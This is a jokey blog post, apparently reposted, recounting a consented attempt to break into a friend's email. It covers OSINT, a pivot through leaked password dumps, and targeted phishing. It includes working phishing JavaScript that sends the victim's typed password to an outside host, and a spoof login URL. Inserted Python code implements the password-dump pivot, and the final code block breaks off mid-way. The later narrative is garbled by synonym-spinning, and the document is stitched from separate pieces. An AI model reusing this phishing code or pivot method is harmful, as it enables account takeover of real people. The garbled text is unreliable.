Tumblr Mobile App Hmm Try Again if It Doesnt Work
This blog has moved! This post and other mistakes are now at https://mango.pdf.zone
Hello and welcome to a blog post. I am writing it and you are reading it. It's amazing what we can do with computers these days.
Several months ago
I'm at a ramen place with my friend Diana. Diana isn't her real name, but we're going to pretend it is because that's what all the cool journalists do and I wanna fit in too so don't ruin this for me okay.
I ask her if it would be okay for me to try and hack all her stuff. She's instantly visibly excited. I explain how this could result in me seeing everything she's ever put on a computer ever. She tells me she thinks this is going to be "so good". We lay down some rules:
- I'll start some time in the next 12 months
- No deleting anything she has
- No disrupting her daily life
- Stop asking if she's sure it's okay
Bonus rule from me: Do this entire thing in stealth mode. Don't ever let Diana know that I've started until it's too late.
I mean, obviously it worked since you and I are having this nice little textual discourse right now. Take my hand metaphorically, and I'll guide you through what I tried, my many flubs[1], and how to protect yourself from what I did[2].
And uh also at the end Mario's green friend is there.
Part 1: Research
"""Open Source Intelligence Gathering""" AKA googling furiously and pretending you went to uni for this
Alright uh I'm pretty sure the first thing you do when you're hacking someone is find all their personal information. I'm talking about her email, phone number, address, star sign, whether she uses Android or Windows Phone, her birthday, and so on.
Jeez we're gonna need to know her email address aren't we?
People put lots of their data on LinkedIn (an information landscape that connects your inbox to people you met once in a bar and will forever file under "misc") because it tells them to.
The first thing I see on Diana's LinkedIn[3] is her email address. I hastily put on my black hoodie and get my arms a bit stuck in the sleeves. Hacker voice I'm _in_[4]. Immediately I sigh and put my hands on my temples like a stressed-out banker. It's a @hotmail.com address, which surprises me since, well, who's using Hotmail in the year of our lord 2017? I mean geez if you used hotmail you'd miss out on gmail's excellent security features heyoooo
[x] email address
[ ] the respect of my peers
Does she use this email for Twitter?
Yep.
How about her phone number?
I type a bunch of extremely clumsy things into Google. I'm talkin' "dianalastname@hotmail.com phone". A matrix of what looks like zeroes and ones but is really Google search results flies down my screen at about the speed a normal person would scroll at.
There's a sign-up page for a club she started at her university. The page says "Contact Diana Lastname at dianalastname@hotmail.com or [her phone number]". pew pew got 'em.
[x] email
[x] phone number
[ ] the respect of my peers
Storing the goods
I paste all these things into a Google Doc - an advanced NSA hacking tool leaked in the recent Shadow Brokers incident.
While googling securely, I find an old blog of hers from 2009. It has a search box. I immediately slam "pet", "cat" and "dog" in that search box like it's 2009. The name of someone's pet is often somehow involved in their security, either as their password or as a "Security""" question or something. I find the name of her dog from 2009 and vigorously paste it into my Google Doc.
Let's try getting into her iCloud account
Armed with my weapons-grade Google Doc, I'm ready to have a go at trying to get into something of Diana's[5].
I don't really have a good reason for going after iCloud, so if you could just give me a break for one second
If I click "Forgot Apple ID?" on iCloud, by entering Diana's full name and email address, Apple tells me her Apple ID, and my screen permanently changes to green-on-black text to suit my new lifestyle.
I'm clicking around and there's a section called "account recovery". Sure, I'll have a go.
I can recover the account by clicking "I've uh lost my phone and forgot my password AND locked out of my email". Apple says "okay you giant bozo, fine, just give us a phone number you CAN access, and we'll SMS you instructions to get back into your account". If I was in a movie doing ~crimes~ then I'd use a burner phone number. But since this is just my friend, I use my real phone number. I get an SMS from Apple being like "We received your request and will get back to you within 4 to 6 business millennia. Our Neo-Future Customer Service Representatives will contact your next-of-kin by whatever means of communication is prevalent at the time."
There's another "account recovery" option that says "use a device you already have". I click this, hoping to get a list of Diana's Apple devices. Instead it gives me this:
Daaaaaaaaaaaaaaaammmmit.
I have taken the wrong path in this text adventure game.
I've just notified Diana that someone's trying to reset her account.
For me that would set off all kinds of warning bells and I'd start furiously investigating what's going on with all my accounts because I'm very cool and collected. But I'm just going to hope that Diana is a normal human being who is not obsessively paranoid like me and just ignores all of those pesky automated emails from Apple and Microsoft being like "blah blah account blah" or "blah blah new sign in blah" because I mean who really has time for those we've all got places to go and phones to scroll I mean reallY who's gonna pay attention to one liTtlE email when there's a whole sea of low quality memes to scroll past on Facebook? I mean wouldn't you rather see some nice political memes? Newsfeed alert: Some guy from high school has just been tagged in- oh wow wait this one's about your local government, wowee they've even managed to use the meme font while standing their ground and writing all the text as though it's a trying-to-sound-formal letter from your school principal who is still badly trying to combat cyberbullying using nothing but stern words and beginning every sentence with "In regards to…."
There's no way for me to know if she saw the notification, so I stop rolling around on the floor whispering about low quality memes and get back to work.
Several days later
My phone rings. I can feel the vibration in my pocket and I'm like "is someone calling me here in the year of our lord 2022 I can't believe this". I don't recognise the number.
"Hello?"
"Hi, who am I talking to?"
"It's uh Alex."
"Alex?"
"Yeah."
"Alex "?"
"Uh, noooo it's-"
"Ohhhhhhhhhhhhh."
"Wait so who am I talking to?"
It's Diana.
"What's up?", I ask.
She explains to me how she got an email from Apple about her account and there was a phone number in it. I tug my collar several meters into the next room, knocking over several carefully-potted indoor plants.
I hit pause on this whole thing, immediately own up, and say "yep, that was me, no need to worry, and I didn't get anywhere, your iCloud account is safe and s- Wait a minute are you telling me you got an email from Apple saying someone tried to reset your account, realised it wasn't you, saw the phone number, and then CALLED it? What was your plan if some hacker answered??"
She didn't have a plan. She just called it as soon as she saw it, the absolutely off-the-rails lunatic.
We have a nice chat and agree to hang out later. She asks me if I've "hacked her already", and I say "no comment" to preserve my so-far flawless operational security.
Before I hang up, I wanna show off my work so far.
"Hey Diana, one more thing"
"Yeah?"
"Check it out. Did you ever play a game called…….. Fashion Fantasy Beach?"[6], I say, coolly and relatably.
Diana freaks out and starts laughing. She's forgotten about this game and me reminding her of her account brings back good memories.
"Can you like, find all the accounts I had on all those game websites?"
Sweet young Diana. If only it worked that way. Hacking can only be used for stealing government secrets and ransoming bitcoins. It's just not that simple.
"By the way, just checking, it's still okay for me to try and hack all your stuff right?" "SO okay"
Part 2: Hackinggggg
At this point I could reset Diana's password for some services by answering her "Security""" Questions with all the information I've gathered.
But, I realise, far too late and to the live studio audience's dismay, that would violate the "don't interfere with her daily life" part of our deal. If I reset her password, this will lock her out of whatever account I reset. So, I have to get access stealthily. This will uh heavily involve knowing her password rather than resetting it.
For a long time I consider doing the renaissance-era "send 'em a word doc with a macro in it to get control of their computer then submit to defcon" but I worry that sweet young millennials like Diana don't even use Word because they do everything on their phone or Google Docs while simultaneously consuming 17.28 avocados per second look it up.[7]
I guess that makes the most valuable thing in her life her email. If you remember earlier, I cunningly divined her email address in Part 1, so I'm basically halfway there. If I get her email, I can just reset her password for Facebook, Twitter, Fashion Fantasy Beach, etc. My cyber attack vector cyber entry point exploit would then be typing the password into the Hotmail login screen using the Google Chrome Web Browsing Software.
The shady password market
Alright listen we're about to go into password paradise so buckle whatever it is you normally buckle. Hackers right, they hack websites. Hoo boy they just love to pop those hypertext pages. Like Dropbox, MySpace, LinkedIn, Adobe, Tumblr, and many, many more. They try to steal everyone's username and password from these sites by making a copy of the database and taking it. Sometimes, the database of usernames and passwords they steal gets released on the ~dark web~, for free or for money. Conveniently, there's a website (https://haveibeenpwned.com) which lets you type in your email address (not your password you big bozo) and find out whether any of your passwords have appeared in these leaked stolen databases.
But…. nowhere does it say you have to type in your email address. Cunningly, I type dianalastname@hotmail.com, executing hacking.
Here we can see a couple of websites Diana has accounts on have been hacked. The only one which had passwords stolen for Diana was Tumblr. So the next goal is to acquire the Tumblr database leak from 2013.
Let's get the old Tumblr database
I try to use my ~hacker connections~ to get a copy of the Tumblr database. I meet someone whose forum handle is like d4rkrayne or whatever in a local park at 11pm. A colossal vape cloud leads me to him, waiting under a tree, puffing furiously. I look down my 1987 mirror-tinted aviators and say "how much?" (my voice comes out several octaves lower and all grizzly like a 40-year-old generic white dude movie star with like, juuust the right amount of stubble). He sells me the database on a pile of 442 floppy disks for 5,000 credits. What a ripoff. I teleport behind him, say "nothin' personal, kid", and hoverboard-kickflip into the night.
…I download the Tumblr database from a publicly accessible, unauthenticated, absolutely not-dark web website. I scramble to get back in my black hoodie, and whip on a second pair of sunglasses over the first. I'm in.
Ancient forbidden password rituals
The Tumblr database dump - a hacking Quest Item - is one long file with lines that look like this:
coolrelateabledude123@gmail.com:3a1920ceb2791d034973c899907847cb58810808
That weird thing after the email is a password hash. A password hash is like a scrambled up version of the password. You can't unscramble it. If you know the password though, you can scramble it and get the same omelette, if ya know what I'm sayin'🍳.
My goal here is to figure out what Diana's actual password is, given that I have her password hash. This process is commonly known as "hacking".
These particular passwords are not just hashed, but also salted[8]. This means that before each password is hashed, the good folks at Tumblr added an extra bit of text to the end of each one. So instead of hashing, say, cooldad64, they'd hash cooldad64HNc62V8.
Finding the table salt
There's no official data on what kind of hashes are in Tumblr.txt.
The fully sick attack I want to do is: hashing a large list of passwords I just happen to have lying around wow and checking if any of the hashes match Diana's password hash. This is called a "dictionary attack", because the person who invented it was actually a dictionary. The problem is, you need to know the salt to do this.
I google around some more, bask in the glory of very poorly constructed sentences on some ~hacker forums~, and ask my ~hacker connections~ in an attempt to find out what the salt is.
But I can't find it because fun fact I'm a total fraud.
Can I get the password… without the salt?
So remember how Tumblr salted the passwords by sticking some random stuff on the end to thwart wannabes like me?
The problem is…. They stick the same thing (in my example, HNc62V8) on the end of every password. This isn't considered the best practice here in the year of our lord 2017 (the proper way is a different random salt for every user), because it means that users with the same password have the same password hash. The emails and passwords would look like this:
markjohnson64@email.com:cooldad64HNc62V8
chicago.tony1@email.com:cooldad64HNc62V8
patriotsfan69@email.com:p@triots69HNc62V8
iamsherlocked.ravenclaw@email.com:Bongo1HNc62V8
I search Tumblr.txt not for dianalastname@hotmail.com, but for her password hash (3a1920ceb2791d034973c899907847cb58810808).
I find more than 20 Tumblr users with the same password as Diana aw yeah
[REDACTED]@email.com:3a1920ceb2791d0…
[REDACTED]@email.com:3a1920ceb2791d0…
[REDACTED]@email.com:3a1920ceb2791d0…
[REDACTED]@email.com:3a1920ceb2791d0…
This makes me think that Diana's password is probably not very unique, since all these other Dr. Who enthusiasts on Tumblr have also thought of it.
But also. Now I've got 20 other email addresses with the same password as Diana. Thanks to the miracle of everyone using the same password for everything, I've got a way to find Diana's password.
I just so happen AGAIN WOW WHATTA GUY to have the LinkedIn database dump from when LinkedIn was 360 whirlwind slam hacked in 2012[9].
Why do I care about the dump from the LinkedIn hack, you ask, fatigued from many gags and desperate for the part where we actually hack Diana?
LinkedIn also hashed their passwords in 2012, but they didn't add that freshly ground pink Himalayan rock salt to them. Also, the password hashing method they used is cripplingly insecure[10] (unsalted SHA1, a fast general-purpose hash that was never meant for passwords, for all you extremely online people out there). Because of these flubs, most (>97%) of the passwords in the LinkedIn dump are available in plain text, not even hashed at all thanks to the hard work and GPU cycle donations of people in the password cracking community.
I get the 20-ish Tumblr emails who have the same Tumblr password as Diana, and look them all up in the LinkedIn dump. They're not all in there, but good enough baybee.
[REDACTED]@email.com:qwerty1
[REDACTED]@email.com:killer6
[REDACTED]@email.com:qwerty1
[REDACTED]@email.com:qwerty1
More than 80% of them have the same LinkedIn password. (Which we will say is qwerty1.)
This has gotta be Diana's password from Tumblr in 2013. Since all these people had the same password on Tumblr, and most of them have the password qwerty1 on LinkedIn, it's very likely that Diana's Tumblr password is qwerty1.
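Here is the whole pivot from the last few sections as working code. This is an added example, not code from the original post: the dumps are tiny constructed ones (the "Tumblr.txt" lines are generated from known plaintexts so the example is reproducible offline, and the "cracked LinkedIn" lines are made up), the SHA1(password + salt) scheme and the salt value HNc62V8 are assumptions taken from the post's own illustration, and the email addresses other than Diana's are invented. It shows the two attacks side by side: the direct dictionary attack, which fails the moment you feed it the wrong salt, and the hash-twin pivot, which needs no salt at all because every user shares one.

```python
import hashlib
from collections import Counter

# Site-wide salt of the kind the post describes for Tumblr. Hypothetical value,
# taken from the post's own illustration; the real salt is not known.
SALT = "HNc62V8"


def tumblr_hash(password, salt=SALT):
    """SHA1(password + salt), one salt for every user. Assumed scheme, per the post."""
    return hashlib.sha1((password + salt).encode("utf-8")).hexdigest()


# Constructed "Tumblr.txt": email:hash lines, generated here from known plaintexts so
# the example is reproducible. Not real dump entries.
_tumblr_plaintexts = {
    "dianalastname@hotmail.com": "qwerty1",
    "fan1@email.com": "qwerty1",
    "fan2@email.com": "qwerty1",
    "fan3@email.com": "qwerty1",
    "fan4@email.com": "killer6",
    "coolrelateabledude123@gmail.com": "cooldad64",
}
TUMBLR_DUMP = "\n".join(f"{e}:{tumblr_hash(p)}" for e, p in _tumblr_plaintexts.items())

# Constructed "cracked LinkedIn" dump: email:plaintext. One hash-twin reused a different
# password on LinkedIn and one is missing entirely, as the post says happens.
LINKEDIN_CRACKED = """\
fan1@email.com:qwerty1
fan2@email.com:killer6
fan3@email.com:qwerty1
fan4@email.com:killer6
someone.else@email.com:p@triots69
"""


def parse_dump(text):
    """email:value lines -> {email: value}. Splits on the first colon only."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        email, value = line.split(":", 1)
        entries[email.lower()] = value
    return entries


def hash_twins(dump_text, target_email):
    """Other accounts whose stored hash equals the target's. Only meaningful with a
    site-wide salt: with per-user salts, equal passwords give different hashes."""
    entries = parse_dump(dump_text)
    target_hash = entries[target_email.lower()]
    return sorted(e for e, h in entries.items()
                  if h == target_hash and e != target_email.lower())


def pivot_candidates(tumblr_dump, cracked_dump, target_email):
    """Look the hash-twins up in a cracked dump from another site and vote on the plaintext."""
    twins = hash_twins(tumblr_dump, target_email)
    cracked = parse_dump(cracked_dump)
    votes = Counter(cracked[e] for e in twins if e in cracked)
    return votes.most_common()


def dictionary_attack(target_hash, wordlist, salt):
    """The direct attack, which needs the salt: hash each guess the way the site did."""
    for guess in wordlist:
        if tumblr_hash(guess, salt) == target_hash:
            return guess
    return None


if __name__ == "__main__":
    target = "dianalastname@hotmail.com"
    diana_hash = parse_dump(TUMBLR_DUMP)[target]
    print("hash twins:", hash_twins(TUMBLR_DUMP, target))
    print("votes:", pivot_candidates(TUMBLR_DUMP, LINKEDIN_CRACKED, target))
    print("with salt:", dictionary_attack(diana_hash, ["password", "qwerty1"], SALT))
    print("wrong salt:", dictionary_attack(diana_hash, ["password", "qwerty1"], "nope"))
```

The vote is the important bit: the pivot never proves anything, it only says which password the twins reused elsewhere, so treat the top candidate as a guess to verify (and, as the next paragraphs show, reuse is less universal than the attacker would like).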
I try to log in to her Hotmail account with the password qwerty1.
"Incorrect password"
Wait please this was supposed to be easy please no why is it like this don't do this to me
Oh come on I was supposed to be hacking a normal person who uses the same password for everything this isn't fair. There are entire criminal industries built on the idea that people use the same password all over the place because nobody cares enough to remember more than a few passwords because they've got things to scroll on their phone okay.
Somehow, Diana is one of the rare few people who is not a security expert but has more than one password for her stuff.
I try this password on a few of her other accounts (Facebook, Twitter, iCloud) and it works on none of them[11].
On Facebook, I'm conveniently informed that this password was her password 5 months ago, but isn't any more.
Looks like I just missed out. The plot thickens audibly.
This was supposed to be the part where I say "and then I logged into her email 100% stealthily", equip my 3rd consecutive pair of sunglasses, and move on to the next bit. But alas, Diana was only in one leaked password list on haveibeenpwned.com at the time, so there goes that.
Fiiiiiiiiiiine whatever I don't even care I'm not crying, you're crying. Time to do this the old fashioned way. And by "the old fashioned way" I of course mean "the way government hackers do it".
Part 3: Hackinggggg (again)
Social engineering
Alright so we're just going to trick her into telling me her password. Is that cheating? Basically. But absolutely I'm going to do it anyway.
To get into her email, I need to know Diana's email password. Resetting the password won't work (since that would interrupt her life by locking her out of her email). I don't really wanna follow her around, man-in-the-middle attack her phone or laptop when it connects to insecure WiFi and steal her browser session, so that leaves us with: phishing.
You may have heard of "phishing", the process of emailing someone and tricking them into doing something, like giving you their password.
Now, hold up bucko, you're probably thinking of the kind of phish where someone says "good day sir I nigerian prince give you $1 million dollars USD u are royalty 2 me" etc. etc.
Or maybe you're thinking of someone sending an email that says "[heavy breathing] pls clikc on my urls http://click.here.to.go.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe"
But with nothing more than paperclips, chewing gum, a single fidget spinner, and an advanced psychology degree, we can not just steal Diana's password, but do it without Diana realising she's been tricked.
Hand-crafting artisanal phishing emails to sell at the Sunday markets
Let's write down what we want to do:
- Get Diana's email password
- Don't let her realise that the email is not legit
Hmm I guess there were only two dot points uhh sorry that doesn't seem worth having dot points at all ummmm
So anyway the trick to phishing is that you don't want to engage the victim's attention. You want them to interact with your email mindlessly, without thinking it's a big deal. Kinda like how you click through email notifications from Twitter (or anything that sends you email notifications) without actually thinking about the email, because you're thinking about what awaits on the other end.
The other way, rather than distracting the victim, is to misdirect them. You give them something that's way more interesting to pay attention to than your dodgy link. Common examples of this include emails that say "OMG your account has been HACKED, log in here to fix it".
But of course, you log in to a fake website which steals your password.
Wow actually that sounds pretty[12] easy[13] doesn't it? Let's try that then.
I'll make an email that says "Your Microsoft Account Has Been Hacked And Uh If You Don't Log In Now It Will Get Deleted So Uh Yeah You Better Log In".
Instead of designing my own legit-looking Microsoft email, it's easier to just copy one that Microsoft has already made. I search my hotmail account[14] for an automated email from Microsoft.
I use the incredibly cutting edge "Inspect Element" feature of the popular hacking software, Google Chrome, to edit the text of the email but keep the look. As I right click and hover over "Inspect Element", my laptop instantly explodes, I get root access to Microsoft, I'm added 50 times to every NSA watchlist, my text permanently changes to green-on-black, and I'm accepted to DEFCON.
Now it looks like this:
I can't send the email from my email account, because I'm not a total amateur. I use the popular hacking tool The Microsoft Sign Up Screen to make the hotmail account "msftacountteam@outlook.com". If you look closely, "account" is spelled wrong. I used "msft" because it wouldn't let me include the word "microsoft".
I try to register an account with first name "Microsoft" and last name "Account Team". The signup form doesn't let me. Damn. Thwarted by Microsoft lackeys. Probably, Microsoft doesn't let you have "Microsoft" in your account name to prevent, uh, exactly what I'm doing. Hmmm. I don't really want to have a typo in the name, like "Micorsoft", since Diana might notice that.
Instead I, a level 8 Wizard, cast a spell to swap the "o" characters in "Microsoft" for a special unicode character (like an emoji but much worse) that looks exactly like an "o". It's not, of course, it's our old friend, the Greek letter "Omicron". Here's the two pals side-by-side:
οo
Awww, just look at 'em having a blast. These little guys might look different in the font your device is using, but in the hotmail web UI font they look juuuust right👌.
So now, my account's name isn't "Microsoft", it's "Micr[omicron]s[omicron]ft", according to the code that checks whether you have a valid name when you sign up for an account.
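For anyone who owns a signup form or a mail filter, here is what the omicron trick does to a naive blocklist and two checks that catch it. This is an added example, not the signup code the post describes (which is not public); the names are constructed, and the way the signup form checks names is assumed to be a plain substring match, which is the only behaviour the post's experiment supports. Note that Unicode NFKC normalisation alone does not help, because omicron is a distinct letter and not a compatibility variant of "o"; you need either a mixed-script check or a confusables fold (the fold table below is a tiny hand-made subset, not the full Unicode confusables list).

```python
import unicodedata

# Constructed sample display names. The second is the post's trick: Greek small omicron
# (U+03BF) in place of every Latin "o".
LATIN_NAME = "Microsoft Account Team"
SPOOFED_NAME = "Micr\u03bfs\u03bfft Account Team"

# Tiny hand-made confusables table for this example; the real Unicode confusables list
# is far larger. Maps look-alike letters to the Latin letter they imitate.
CONFUSABLES = {
    "\u03bf": "o",  # GREEK SMALL LETTER OMICRON
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
}


def contains_blocked_word(text, blocked=("microsoft",)):
    """Plain substring check, the kind of check the post's experiment implies. Beaten by homoglyphs."""
    lowered = text.lower()
    return any(word in lowered for word in blocked)


def nfkc_only_blocked(text, blocked=("microsoft",)):
    """Same check after NFKC normalisation. Still beaten: omicron is not a compatibility form of 'o'."""
    return contains_blocked_word(unicodedata.normalize("NFKC", text), blocked)


def scripts_in(text):
    """Set of scripts used by the letters in text. unicodedata exposes no Script property, so the
    first word of each character's name (LATIN, GREEK, CYRILLIC, ...) is used as a stand-in; this
    is an assumption that holds for the confusable scripts that matter here."""
    scripts = set()
    for ch in text:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts


def is_mixed_script(text):
    """A display name written in more than one script is the classic homoglyph signature."""
    return len(scripts_in(text)) > 1


def skeleton(text):
    """Fold known confusables to their Latin look-alikes, then NFKC-normalise and lowercase."""
    folded = "".join(CONFUSABLES.get(ch, ch) for ch in text)
    return unicodedata.normalize("NFKC", folded).lower()


def contains_blocked_word_hardened(text, blocked=("microsoft",)):
    """Reject mixed-script names outright, and run the blocklist on the folded skeleton."""
    return is_mixed_script(text) or contains_blocked_word(skeleton(text), blocked)


if __name__ == "__main__":
    for name in (LATIN_NAME, SPOOFED_NAME, "Kathleen Wheeler"):
        print(repr(name), "naive:", contains_blocked_word(name),
              "nfkc:", nfkc_only_blocked(name),
              "scripts:", sorted(scripts_in(name)),
              "hardened:", contains_blocked_word_hardened(name))
```

The mixed-script rule is deliberately blunt: a name legitimately written entirely in Greek or Cyrillic passes, while a Latin name with one foreign letter dropped in does not, which is exactly the shape of the attack. Whichever check you use, apply it to the sender's display name as well as the address, since that is the field the recipient actually reads.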
I'm sure you're wondering how this whole process ends up with me getting Diana's password, laughing manically in my comically giant leather chair. After she clicks the link in my legit looking email, she'll be asked to log in[15]. The page she goes to will look just like the Hotmail login page, but it will actually be a copy that sends the password to me.
How can I make such a page? Well I'll clone the real page, register a domain that looks similar to login.live.com, host my cloned page there, and so on. Juuust kidding, the static website hosting service Aerobatic happens to also be an excellent phishing service.
I can register [anything].aerobatic.io, and deploy my static HTML to that domain with their command line tool for free.
Shout outs to Aerobatic for the smooth smooth phishing UX. Use the referral code DIANA to be immediately reported to the NSA.
I copy the existing login.live.com page, and pre-fill dianalastname@hotmail.com in the "email address" field. I deploy this page extremely trivially to login-live.aerobatic.io, and equip my fourth pair of sunglasses (don't worry I've earned it). This almost looks right, but the real Hotmail login form has a bunch of stuff after the / in the URL, so I copy/paste some of that good stuff too[16].
Here's the exact URL, if you're interested. Also if you're not interested. It's gonna be there either way.
https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin
Perfect[17]. This looks like enough to fool a cursory glance, and that's all we need baybee. Maybe she'll think "why do I have to log in again? I'm already logged in to my email?", but the email asks for a "Secure Login" (whatever that is).
Here's what the login page does:
// When the Login button is clicked or Enter is pressed
$('#passwordForm').on('submit', function() {
  var password = $('#password').val();
  // Create an image with a URL that points to my website.
  // The browser will request this URL in an attempt to load the image (which will fail, since that URL doesn't exist).
  // The password goes in the query string, URL-encoded so characters like & or # don't cut it short.
  $('body').append('<img src="https://a-website-i-own.com/DIANA?' + encodeURIComponent(password) + '" alt="image">');
  // Wait one second to simulate loading time (adjust to 0.1s if you don't live in Australia sigh), and then go to the real Hotmail login page.
  // Diana will already be logged in, so this will seem to her exactly like she's just logged in to hotmail.
  window.setTimeout(function() { window.location = 'https://login.live.com'; }, 1000);
  return false;
});
This works by sending her password to me when she clicks "log in". The password is sent to a website of mine. Then I send her along to the real Hotmail, so it looks just like she logged in. The website logs everything that gets sent to it, so I can then search my logs for "DIANA" to find the log line containing the password.
This is all what I'm hoping for, anyway. The email says she has 48 hours to comply to create time pressure. Telling you that you have to do something right now is a common tactic to make you think instinctively and irrationally.
I log in to my fake "Microsoft Account Team" hotmail account, send the email to dianalastname@hotmail.com and wait for her to take herself a red-hot browse.
About 12 hours later, I check my logs to see if she's typed her password.
She hasn't.
I wait another 12 hours.
Still nothing.
I send the email again, wincing slightly, this time saying she has 24 hours.
Still nothing.
Well damn
I guess that didn't work. She must have just ignored the email as uninteresting[18]
I try to think of non-phishing ways to get her password but really phishing is just too good. The nice thing about being the attacker is that you can put your eggs in many baskets. Diana has to defend against all of my eggs, and I've got baskets for days. Time for round 2.
Sniper scope targeted phishing blap blap
I reach under my desk, unwrap a package addressed to "DIRECTOR OF CYBER, NSA", slide out a yellow and black canister labelled "China", break open the safety seal, and use safety tongs to extract the following red-hot phish.
This time, instead of using a generic idea that would work on anyone ("suspicious account activity"), we'll make something special just for Diana. Kinda like hand-knitting a beanie, but comparatively less wholesome.
I Google "google docs microsoft equivalent" and come across I dunno SkyDrive or SkyDocs 365 Pro or something or OneDrive look I dunno just look it's Google Docs but Microsoft so good enough for me.
I make a convincing looking resume (in Google Docs, of course) and copy it into a OneSkyCloudDrive 364/2 Days: Final Remix HD+ Doc.
Let's play: who's gonna send this doc to Diana?
I find a local company that's likely to legitimately want to talk to Diana, and search for a recruiter who works there on LinkedIn. I make someone with the same first name, but a different last name as a real recruiter from this company[19].
I make a fake gmail account called Kathleen Wheeler, using a stock photo of a middle-aged western woman as the profile photo.
Here's what Kathleen is going to email Diana.
Looks legit riiiight?
The questions at the end are just some garbage I made up, but the point of them is to distract Diana right after she reads the "click here".
I put Diana's real phone number at the end to make it more convincing. This email is obviously meant just for her. It also makes sense for the phone number to be there, since presumably whoever listed Diana as a referee gave the phone number to Kathleen.
At the time she types her password, we want Diana to be thinking of what's on the other side of the login screen.
The delicious bait here is that this email says "someone said they know you", and you have to read the resume to find out who. Aw, but the resume is behind a pesky link. ~Guess you better just click on it~. LinkedIn also does this in their, um, "engagement" emails which say things like "you have 2 new messages", but not who they're from or what they say.
When Diana clicks on the link to the "resume", it will take her to the same fake login page (with her email pre-filled) as before. When she types anything in the password box, the site will wait one second and then send her to the Microsoft Google Doc™. The one-second wait is to simulate Australian internet speeds HAHAHAHAhahahahahah this sucks
She'll find that she doesn't know the person, probably because they're completely made up. They have work experience at real workplaces nearby, and went to the same university as Diana at around the same time, so hopefully their resume passes a cursory glance[20].
Finding an unfamiliar resume is a sufficient, but not especially satisfying conclusion to the adventure of the weird email from Kathleen. But of course, by then it's too late, I'm sitting in my ivory tower surrounded by passwords.
I make sure to send it during business hours, from "Kathleen""", pull a necklace from under my shirt dramatically, kiss it, look up at the sky, and wait.
Waiting
That night, I check my website's logs for any passwords from my fake Hotmail login form.
- - [[date]:16:32:30 +1000] "GET /DIANA?qwerty1 HTTP/1.1" 404 4702 "https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=http...." "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
"Got it!"
….. is what I think, at first.
Especially keen readers will have noticed that the password Diana has typed into my fake Hotmail login page is… the same password as we found for her in the Tumblr database.
This is not her Hotmail password, and everything is terrible.
From this we can draw two conclusions:
- Diana doesn't know what her Hotmail password is
- She now thinks her hotmail password is qwerty1, since she typed it into my fake login page which accepts any password, and it worked
I almost gave up at this point, but a last-minute outburst of desperation/frustration/final destination helped me work up the courage to take another shot here in Act 3.
By this point my fake Microsoft Account Team email account has been soft-banned by the good people at William Gates Inc. for sending so many obvious phishing emails. I have to prove I'm a human and add my phone number to the account, and then it unlocks and I can edit the Microsoft Google Doc.
I hastily make a new fake resume of significantly lower quality than the first i, and make a crucial change to my simulated login page.
My simulated login page at present says "incorrect password" no matter what you type in the first two times you try typing something. If you type qwerty1, then the password counter doesn't go up21.
What exercise people do when they become a "wrong password" error? Effort all of the three or 4 passwords they use for everything, of course.
I desire to try and become Diana to type qwerty1, get a "wrong countersign" fault, and then just unload all her passwords into my form.
Diana replied to my failed email with "deplorable I don't know this person", and so Kathleen replies with, "wrong resume lol, here's the new one" even though this makes zero sense in the context of our e-mail exchange. I'k hoping Diana will only be busily checking the electronic mail on her phone and not really notice this discrepancy.
I use a dissimilar font from the "form" when typing as Kathleen to make it look like this is a form that gets re-create/pasted to every candidate. This makes Kathleen seem like she does this all the fourth dimension in her big bustling, 100% real office. I also do my all-time to imitate the tone of a polite but stressed out office worker. Y'all can almost hear the part politics. It'south called method acting.
Time to stressfully wait for Diana to check for her electronic mail again, and then at present would be a good time to read out some donations.
Hours later
It works.
108.162.249.169 - - [12/May/2017:13:39:43 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702 "https://docs-login-alive.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
I get only one password from Diana (typed multiple times), but it's different to the last one I got (qwerty1)[22].
I wait until she's asleep based on her Facebook Messenger last active time and log into her email using the elite hacking method of typing her password into the box.
The reason I waited until she was asleep was in case Hotmail emailed the account saying "New Sign In". It doesn't, and I'm rewarded with her email inbox screen in its full glory.
Angels sing softly above me. A small yellow bird lands on my shoulder and begins to chirp softly. I get several emails from the bullies in high school - they're really sorry and they've done a lot of soul searching and they want to make it up to me and I should expect premium fruit baskets on my doorstep in the coming months. Global warming halts.
"But that would never work on me"
It would tho.
Maybe some of you in the audience are thinking "Wow, this Diana person must be pretty dumb to fall for that. Good thing I'm a web browsing prodigy with a colossal brain and many opinions, so that would never happen to me."
The thing is, right now you're very alert, because you're reading a blog post about hacking. If you were just reading your email, half-paying-attention on a train as normal, security wouldn't likely be on your mind. If sending trick emails is good enough for whoever the NSA are emailing, then it's probably good enough to work on you and me.
I guess what I'm saying here is "don't go shaming phishing victims plz".
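The log lines above also show why the lookalike URL was convincing: the real hostname accounts.live.com sits inside the query string, while the form actually posts to an aerobatic.io subdomain. As an added defender-side example (not code from this post), here is a small Python parser for lines in that Combined Log Format, plus a check that judges a login URL by the host the browser actually talked to; the sample log lines, IP, timestamp and the LEGIT_LOGIN_HOSTS allowlist are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in the same Combined Log Format as the ones
# quoted in the post. IP and timestamp are made up; the first referer imitates the
# lookalike hostnames the post shows (docs-login-alive.aerobatic.io).
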